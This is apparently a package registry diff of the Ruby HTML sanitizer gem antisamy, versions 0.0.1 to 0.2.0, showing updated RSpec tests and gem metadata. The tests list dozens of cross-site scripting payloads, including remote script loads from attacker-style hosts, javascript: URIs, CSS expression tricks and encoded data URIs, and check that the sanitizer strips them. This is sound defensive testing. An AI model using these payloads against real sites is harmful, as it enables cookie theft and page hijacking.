antisamy 0.0.1 → 0.2.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- data/README.rdoc +6 -1
- data/lib/antisamy/css/css_filter.rb +187 -0
- data/lib/antisamy/css/css_scanner.rb +84 -0
- data/lib/antisamy/css/css_validator.rb +129 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/attribute_condition.rb +50 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/begin_hyphen_condition.rb +18 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/class_condition.rb +18 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/combinator_condition.rb +36 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/condition.rb +29 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/id_condition.rb +23 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/one_of_condition.rb +18 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/pseudo_class_condition.rb +20 -0
- data/lib/antisamy/csspool/rsac/sac/conditions.rb +5 -0
- data/lib/antisamy/csspool/rsac/sac/document_handler.rb +66 -0
- data/lib/antisamy/csspool/rsac/sac/error_handler.rb +13 -0
- data/lib/antisamy/csspool/rsac/sac/generated_parser.rb +1012 -0
- data/lib/antisamy/csspool/rsac/sac/generated_property_parser.rb +9284 -0
- data/lib/antisamy/csspool/rsac/sac/lexeme.rb +27 -0
- data/lib/antisamy/csspool/rsac/sac/lexical_unit.rb +201 -0
- data/lib/antisamy/csspool/rsac/sac/parse_exception.rb +4 -0
- data/lib/antisamy/csspool/rsac/sac/parser.rb +109 -0
- data/lib/antisamy/csspool/rsac/sac/property_parser.rb +44 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/child_selector.rb +36 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/conditional_selector.rb +45 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/descendant_selector.rb +36 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/element_selector.rb +35 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/selector.rb +25 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/sibling_selector.rb +35 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/simple_selector.rb +21 -0
- data/lib/antisamy/csspool/rsac/sac/selectors.rb +5 -0
- data/lib/antisamy/csspool/rsac/sac/token.rb +25 -0
- data/lib/antisamy/csspool/rsac/sac/tokenizer.rb +185 -0
- data/lib/antisamy/csspool/rsac/sac.rb +14 -0
- data/lib/antisamy/csspool/rsac/stylesheet/rule.rb +20 -0
- data/lib/antisamy/csspool/rsac/stylesheet/stylesheet.rb +76 -0
- data/lib/antisamy/csspool/rsac/stylesheet.rb +3 -0
- data/lib/antisamy/csspool/rsac.rb +1 -0
- data/lib/antisamy/html/handler.rb +4 -0
- data/lib/antisamy/html/sax_filter.rb +49 -33
- data/lib/antisamy/html/scanner.rb +1 -43
- data/lib/antisamy/policy.rb +8 -3
- data/lib/antisamy/scan_results.rb +68 -0
- data/lib/antisamy.rb +4 -0
- data/spec/antisamy_spec.rb +111 -3
- metadata +39 -3
data/spec/antisamy_spec.rb
CHANGED
@@ -2,7 +2,9 @@ require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
|
|
2
2
|
|
3
3
|
module AntiSamy
|
4
4
|
describe AntiSamy do
|
5
|
-
let(:policy_file) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy.xml"}
|
5
|
+
let(:policy_file) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy-testing.xml"}
|
6
|
+
let(:strict_policy) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy-anythinggoes.xml"}
|
7
|
+
let(:policy_object) {AntiSamy.policy(policy_file)}
|
6
8
|
|
7
9
|
it "should load a policy" do
|
8
10
|
p = AntiSamy.policy(policy_file)
|
@@ -17,12 +19,118 @@ module AntiSamy
|
|
17
19
|
end
|
18
20
|
|
19
21
|
it "should tak our input and remove the script tags" do
|
20
|
-
input = "<p>Hi</p><script> some junk</script>"
|
22
|
+
input = "<p style='font-size: 16px'>Hi</p><script> some junk</script>"
|
21
23
|
expec = "<p>Hi</p>"
|
22
24
|
p = AntiSamy.policy(policy_file)
|
23
25
|
r = AntiSamy.scan(input,p)
|
24
26
|
r.clean_html.should == expec
|
27
|
+
r.messages.size.should == 2 # error 1 for script tag, error 2 for style tag
|
25
28
|
end
|
26
|
-
|
29
|
+
|
30
|
+
# Script attacks
|
31
|
+
{
|
32
|
+
"test<script>alert(document.cookie)</script>" => "script",
|
33
|
+
"<<<><<script src=http://fake-evil.ru/test.js>" => "<script",
|
34
|
+
"<script<script src=http://fake-evil.ru/test.js>>" => "<script",
|
35
|
+
"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "<script",
|
36
|
+
'<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>' => "onload",
|
37
|
+
"<BODY ONLOAD=alert('XSS')>" => "alert",
|
38
|
+
"<iframe src=http://ha.ckers.org/scriptlet.html <" => "<iframe",
|
39
|
+
"<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">" => "src"
|
40
|
+
}.each_pair do |k,v|
|
41
|
+
it "should remove #{v} from #{k} for script attacks" do
|
42
|
+
r = AntiSamy.scan(k,policy_object)
|
43
|
+
r.clean_html.should_not include(v)
|
44
|
+
end
|
45
|
+
end
|
46
|
+
|
47
|
+
#Image Attacks
|
48
|
+
{
|
49
|
+
"<img src='http://www.myspace.com/img.gif'>"=>"<img",
|
50
|
+
"<img src=javascript:alert(document.cookie)>"=>"<img",
|
51
|
+
"<IMG SRC=javascript:alert('XSS')>"=>"<img",
|
52
|
+
"<IMG SRC=javascript:alert('XSS')>" => "&",
|
53
|
+
"<IMG SRC=javascript:alert('XSS')>"=>"&",
|
54
|
+
"<IMG SRC=\"jav
ascript:alert('XSS');\">" => "alert",
|
55
|
+
"<IMG SRC=\"javascript:alert('XSS')\"" => "javascript",
|
56
|
+
"<IMG LOWSRC=\"javascript:alert('XSS')\">"=>"javascript",
|
57
|
+
"<BGSOUND SRC=\"javascript:alert('XSS');\">"=>"javascript",
|
58
|
+
}.each_pair do |k,v|
|
59
|
+
it "should remove #{v} from #{k} for image attacks" do
|
60
|
+
r = AntiSamy.scan(k,policy_object)
|
61
|
+
r.clean_html.should_not include(v)
|
62
|
+
end
|
63
|
+
end
|
64
|
+
|
65
|
+
# Css attacks
|
66
|
+
{
|
67
|
+
"<div style=\"position:absolute\">" => "position",
|
68
|
+
"<style>b { position:absolute }</style>" => "position",
|
69
|
+
"<div style=\"z-index:25\">" => "z-index",
|
70
|
+
"<style>z-index:25</style>" => "z-index",
|
71
|
+
"<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family"
|
72
|
+
}.each_pair do |k,v|
|
73
|
+
it "should remove #{v} from #{k} for CSS attacks" do
|
74
|
+
r = AntiSamy.scan(k,policy_object)
|
75
|
+
r.clean_html.should_not include(v)
|
76
|
+
end
|
77
|
+
end
|
78
|
+
|
79
|
+
#href attacks
|
80
|
+
{
|
81
|
+
"<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">" => "href",
|
82
|
+
"<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">" => "href",
|
83
|
+
"<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>" => "ha.ckers",
|
84
|
+
"<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "ha.ckers",
|
85
|
+
"<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "xss",
|
86
|
+
"<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS" => "javascript",
|
87
|
+
"<IMG SRC='vbscript:msgbox(\"XSS\")'>" => "vbscript",
|
88
|
+
"<a . href=\"http://www.test.com\">" => "href",
|
89
|
+
"<a - href=\"http://www.test.com\">" => "href",
|
90
|
+
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">" => "meta",
|
91
|
+
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">" => "meta",
|
92
|
+
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">" => "meta",
|
93
|
+
"<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>" => "iframe",
|
94
|
+
"<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>" => "javascript",
|
95
|
+
"<TABLE BACKGROUND=\"javascript:alert('XSS')\">" => "background",
|
96
|
+
"<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">" => "background",
|
97
|
+
"<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">" => "javascript",
|
98
|
+
"<DIV STYLE=\"width: expression(alert('XSS'));\">" => "alert",
|
99
|
+
"<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">" => "alert",
|
100
|
+
"<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>" => "alert",
|
101
|
+
"<BASE HREF=\"javascript:alert('XSS');//\">" => "javascript",
|
102
|
+
"<BaSe hReF=\"http://arbitrary.com/\">" => "base",
|
103
|
+
"<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>" => "object",
|
104
|
+
"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>" => "object",
|
105
|
+
"<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>" => "embed",
|
106
|
+
"<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>" => "embed",
|
107
|
+
"<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
|
108
|
+
"<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
|
109
|
+
"<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
|
110
|
+
"<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
|
111
|
+
"<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
|
112
|
+
"<SCRIPT SRC=http://ha.ckers.org/xss.js" => "script",
|
113
|
+
"<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>" => "style",
|
114
|
+
"<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>" => "calc.exe",
|
115
|
+
"<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->" => "javascript",
|
116
|
+
"<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">" => "<a style=",
|
117
|
+
"<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "href",
|
118
|
+
"<b><i>Some Text</b></i>" => "<i />",
|
119
|
+
"<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family",
|
120
|
+
"<style type=\"text/css\"><![CDATA[P { margin-bottom: 0.08in; } ]]></style>" => "margin"
|
121
|
+
|
122
|
+
}.each_pair do |k,v|
|
123
|
+
it "should remove #{v} from #{k} for href attacks" do
|
124
|
+
r = AntiSamy.scan(k,policy_object)
|
125
|
+
r.clean_html.should_not include(v)
|
126
|
+
end
|
127
|
+
end
|
128
|
+
|
129
|
+
it "shoud import some stylesheets" do
|
130
|
+
input = "<style>@import url(http://www.owasp.org/skins/monobook/main.css);@import url(http://www.w3schools.com/stdtheme.css);@import url(http://www.google.com/ig/f/t1wcX5O39cc/ig.css); </style>"
|
131
|
+
r = AntiSamy.scan(input,policy_object)
|
132
|
+
r.clean_html.should_not be_empty
|
133
|
+
end
|
134
|
+
|
27
135
|
end
|
28
136
|
end
|
metadata
CHANGED
@@ -2,7 +2,7 @@
|
|
2
2
|
name: antisamy
|
3
3
|
version: !ruby/object:Gem::Version
|
4
4
|
prerelease:
|
5
|
-
version: 0.0
|
5
|
+
version: 0.2.0
|
6
6
|
platform: ruby
|
7
7
|
authors:
|
8
8
|
- Sal Scotto
|
@@ -10,7 +10,7 @@ autorequire:
|
|
10
10
|
bindir: bin
|
11
11
|
cert_chain: []
|
12
12
|
|
13
|
-
date: 2011-03-
|
13
|
+
date: 2011-03-14 00:00:00 -04:00
|
14
14
|
default_executable:
|
15
15
|
dependencies:
|
16
16
|
- !ruby/object:Gem::Dependency
|
@@ -112,6 +112,42 @@ extra_rdoc_files:
|
|
112
112
|
- README.rdoc
|
113
113
|
files:
|
114
114
|
- lib/antisamy.rb
|
115
|
+
- lib/antisamy/css/css_filter.rb
|
116
|
+
- lib/antisamy/css/css_scanner.rb
|
117
|
+
- lib/antisamy/css/css_validator.rb
|
118
|
+
- lib/antisamy/csspool/rsac.rb
|
119
|
+
- lib/antisamy/csspool/rsac/sac.rb
|
120
|
+
- lib/antisamy/csspool/rsac/sac/conditions.rb
|
121
|
+
- lib/antisamy/csspool/rsac/sac/conditions/attribute_condition.rb
|
122
|
+
- lib/antisamy/csspool/rsac/sac/conditions/begin_hyphen_condition.rb
|
123
|
+
- lib/antisamy/csspool/rsac/sac/conditions/class_condition.rb
|
124
|
+
- lib/antisamy/csspool/rsac/sac/conditions/combinator_condition.rb
|
125
|
+
- lib/antisamy/csspool/rsac/sac/conditions/condition.rb
|
126
|
+
- lib/antisamy/csspool/rsac/sac/conditions/id_condition.rb
|
127
|
+
- lib/antisamy/csspool/rsac/sac/conditions/one_of_condition.rb
|
128
|
+
- lib/antisamy/csspool/rsac/sac/conditions/pseudo_class_condition.rb
|
129
|
+
- lib/antisamy/csspool/rsac/sac/document_handler.rb
|
130
|
+
- lib/antisamy/csspool/rsac/sac/error_handler.rb
|
131
|
+
- lib/antisamy/csspool/rsac/sac/generated_parser.rb
|
132
|
+
- lib/antisamy/csspool/rsac/sac/generated_property_parser.rb
|
133
|
+
- lib/antisamy/csspool/rsac/sac/lexeme.rb
|
134
|
+
- lib/antisamy/csspool/rsac/sac/lexical_unit.rb
|
135
|
+
- lib/antisamy/csspool/rsac/sac/parse_exception.rb
|
136
|
+
- lib/antisamy/csspool/rsac/sac/parser.rb
|
137
|
+
- lib/antisamy/csspool/rsac/sac/property_parser.rb
|
138
|
+
- lib/antisamy/csspool/rsac/sac/selectors.rb
|
139
|
+
- lib/antisamy/csspool/rsac/sac/selectors/child_selector.rb
|
140
|
+
- lib/antisamy/csspool/rsac/sac/selectors/conditional_selector.rb
|
141
|
+
- lib/antisamy/csspool/rsac/sac/selectors/descendant_selector.rb
|
142
|
+
- lib/antisamy/csspool/rsac/sac/selectors/element_selector.rb
|
143
|
+
- lib/antisamy/csspool/rsac/sac/selectors/selector.rb
|
144
|
+
- lib/antisamy/csspool/rsac/sac/selectors/sibling_selector.rb
|
145
|
+
- lib/antisamy/csspool/rsac/sac/selectors/simple_selector.rb
|
146
|
+
- lib/antisamy/csspool/rsac/sac/token.rb
|
147
|
+
- lib/antisamy/csspool/rsac/sac/tokenizer.rb
|
148
|
+
- lib/antisamy/csspool/rsac/stylesheet.rb
|
149
|
+
- lib/antisamy/csspool/rsac/stylesheet/rule.rb
|
150
|
+
- lib/antisamy/csspool/rsac/stylesheet/stylesheet.rb
|
115
151
|
- lib/antisamy/html/handler.rb
|
116
152
|
- lib/antisamy/html/sax_filter.rb
|
117
153
|
- lib/antisamy/html/scanner.rb
|
@@ -138,7 +174,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
|
|
138
174
|
requirements:
|
139
175
|
- - ">="
|
140
176
|
- !ruby/object:Gem::Version
|
141
|
-
hash: -
|
177
|
+
hash: -3694882257398018241
|
142
178
|
segments:
|
143
179
|
- 0
|
144
180
|
version: "0"
|